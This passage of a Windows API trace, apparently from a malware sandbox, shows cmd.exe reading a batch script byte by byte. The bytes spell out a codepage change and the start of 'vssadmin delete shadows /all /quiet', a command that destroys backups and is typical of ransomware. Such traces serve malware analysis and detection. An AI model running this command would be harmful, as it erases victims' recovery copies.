cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.747] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f678, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19f678*=0x2, lpOverlapped=0x0) returned 1 [0032.747] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0032.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.747] _vsnwprintf (in: _Buffer=0x4a8deb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f6b8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0032.747] _vsnwprintf (in: _Buffer=0x4a8debaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x19f6b8 | out: _Buffer=">") returned 1 [0032.747] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.747] GetFileType (hFile=0xf4) returned 0x3 [0032.747] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.747] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0032.747] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x19f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19f6a8*=0x26, lpOverlapped=0x0) returned 1 [0032.747] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.747] GetFileType (hFile=0xe8) returned 0x3 [0032.747] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.747] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.747] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.747] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0032.747] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.747] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.747] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.747] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0032.747] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.747] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.748] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0032.748] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.748] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.748] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.749] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.749] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.749] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0032.749] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.750] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.750] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.750] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.750] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.751] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0032.751] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.751] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.751] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.752] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0032.752] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.752] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.752] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.752] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0032.752] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.752] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.752] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.752] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.752] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.752] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.752] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.752] MultiByteToWideChar (in: 